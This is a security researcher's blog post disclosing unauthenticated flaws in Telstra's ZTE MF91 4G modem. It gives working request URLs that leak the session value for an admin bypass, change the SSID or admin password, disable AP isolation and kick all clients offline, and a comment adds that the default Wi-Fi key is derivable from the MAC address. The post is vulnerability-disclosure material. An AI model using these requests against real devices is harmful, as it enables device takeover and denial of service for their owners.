exploits/tools

Pwning Telstra’s ZTE MF91 Pre-paid 4G modem

735064_orig
Apparently, the average person in Australia carries 2.6 devices. For me, the 0.6 is my Telstra Pre-Paid 4G WiFi modem. All the main Aussie telcos have offerings in this space (Telstra/Optus/Vodafone/Virgin Mobile), and the devices provided usually are Huawei, ZTE or Sierra Wireless wifi modems.

I’ve been using this ZTE MF91 device as sold by Telstra for a couple of years now. Several months ago, I decided to give my MF91 a shakedown in the security space – and a bunch of bugs bubbled to the surface fairly quickly.

PoC
I wrote a basic script (zteeek) that exploits some of the vulnerabilities described below-  it’s available here (I’m not a coder, you’ve been warned, and so on). And here’s a video:

MF91 Vulnerabilites
The fact that you already need to be connected to the wireless network to exploit makes these far less sexy, but nevertheless  it’s a good example of the kind of vulnerabilities that are common in embedded systems. Either a WPS attack or a plain old brute force wireless run against the MF91 would be your best way on to its wireless network – then you can have fun with zteeek. Here’s a quick description of the vulnerability/exploit pairs:

Unauthenticated cookie value disclosure
The core cookie value for authenticated sessions, MF91_Telstra_luck_num can be retrieved via an unauthenticated GET request, after which an attacker can create their own valid admin session cookie to bypass authentication.
http://<deviceip>/goform/pwd_cmd?cmd=lucky_num

Unauthenticated SSID modification
The wireless SSID can be changed by tampering with the ssid parameter without authentication.
http://<deviceip>/goform/wlan_set_basic_sap_profile?ssid=new_SSID

Unauthenticated disabling of AP isolation mode
Access point isolation mode can be disabled without authentication, exposing isolated clients.
http://<deviceip>/goform/wlan_set_basic_sap_profile?=DISABLE

Unauthenticated denial of service (force client disconnect)
A denial of service attack causing the forced disconnection of all clients is possible via a GET request to dhcp_list_cmd without authentication.
http://<deviceip>/goform/dhcp_list_cmd?cmd=set&&mac_addr=

Unauthenticated administrator password change
The administrator password for the ZTE MF91 can be change via a GET request to upd_pwd without authentication.
http://<deviceip>/goform/upd_pwd?password=<new password>

Thank you CrikeyCon!
I was kindly invited to talk about the process around my dealings with the ZTE MF91 at CrikeyCon 2015 in Brisbane, which was a lot of fun. Many thanks to the CrikeyCon staff for entertaining a bunch of Aussie hackers on a very wet day in Brisbane, and thanks also to the fabulous and receptive people in attendance.

sw1tch

3 Comments

  1. Do you feel that the authentication required is the access to said WIFI network before these *hacks* can take place? It’s not like these are public hotspots, they are personal ones.

    It’s like saying, I can steal from my co workers desk, but first I had to get access to the building.

    No disrespect, great insights!

    1. Correct. Likelihood is low from the perspective of a remote, unauthenticated attacker with no access to the wireless network. If you can sniff the MAC address, which is trivial, and the owner hasn’t changed the PSK then you have what you need to join the network as the default PSK is derived easily from the MAC address. Less concerned about this device as about all the other crud consumer and SOHO routers and gateways that use the same development processes, old libraries and packages and generally rush out cheap rubbish to unsuspecting end users.

Leave a Reply to sw1tch Cancel reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.